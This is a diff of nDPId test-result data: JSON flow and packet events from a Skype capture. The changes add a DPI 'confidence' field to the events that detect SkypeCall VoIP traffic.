+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1431970674018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970674018,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxdyEUu77fnywjBZqASOJAmdQAAAgQFrAQCCApO3xkOPjIfpgEDAwk="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1431970674018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970674018,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ax5AAEAGhGTAqAEi1cezr8hFnF3LCMFmLu+36IAQECx9awAAAQEICj4yH9pO3xkO"}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/ed8AAEARbbrAqAEinTg0EjLdgQkAK+56e5UCujNYWaHOaIv8Mbnq8Yy9ltzxTGOAleIkOtVygbgwGI4="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/QPIAAEARV4\/AqAEiQTffKzLdnEYAK9tXe5cCDvOGtur9CosePaKDkKEzL5ekZUj+DrgiIjruAPBzlGM="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2DYgAAEAR1ZfAqAEinTc4ljLdnE4AIk81e5kCIa6rFGHkjW7tTxYGLEfEQXIXcRjIprw="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675578,"flow_last_seen":1431970675578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970675578,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431970675578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970675578,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVJFAAEAGmuXAqAEi1cezr8hHAbtzmW86AAAAALAC\/\/\/ayQAAAgQFtAEDAwUBAQgKPjIl6QAAAAAEAgAA"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1431970675640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970675640,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7yEfSVR1Cc5lvO6ASOJBaGQAAAgQFrAQCCApO3xqhPjIl6QEDAwk="}
@@ -647,75 +647,75 @@
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABAxtRAAEAGKUnAqAEinTfrmMhInF05JqawAAAAALAC\/\/9CLwAAAgQFtAEDAwUBAQgKPjInhAAAAAAEAgAA"}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABB4XAAAEARAafAqAEinTc4kzLdnE4ALQw6e5sCLpawwxGRzNJ9jeoeh5bY+9RpiszLnAcSdcNuRnMOI9PLQQ=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1ktIAAEARBdLAqAEiQTffEjLdnFkAIdOte50CPL9ZRieP6CLGvHSnuteGzwQxXE6Sug=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1431970676061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970676061,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIpxdyEgRBN2QOSamsaASOJC3pAAAAgQFrAQCCApMXif\/PjInhAEDAwk="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1431970676061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970676061,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FvZAAEAG2TPAqAEinTfrmMhInF05JqaxEQTdkYAQECwOiwAAAQEICj4yJ8hMXif\/"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2RjwAAEAR6djAqAEinTfroDLdnFYAIpfGe58CtglNf35c9xed\/TOYZPtdg4AQKYWmKBE="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5iSIAAEARWf7AqAEinTc4kjLdnF4AJWUse6ECi+HEJAzVpo3ery\/yzADPEQnmy2088qUgojE="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677603,"flow_last_seen":1431970677603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970677603,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431970677603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970677603,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVVtAAEAGmsLAqAEinTfrmMhKAbuh9dLFAAAAALAC\/\/9BpgAAAgQFtAEDAwUBAQgKPjItyQAAAAAEAgAA"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1431970677668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970677668,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIgG7yErORgmHofXSxqASOJDMTwAAAgQFrAQCCApMXimSPjItyQEDAwk="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1431970677668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970677668,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tRpAAEAGOw\/AqAEinTfrmMhKAbuh9dLGzkYJiIAQECwjOgAAAQEICj4yLglMXimS"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+xqAAAEAR0mLAqAEinTeCqjLdnFIAKv3he6MC3h4IlBBBiQEMzD2u81WGXlCVYngNZSbA0YydRzOnaw=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
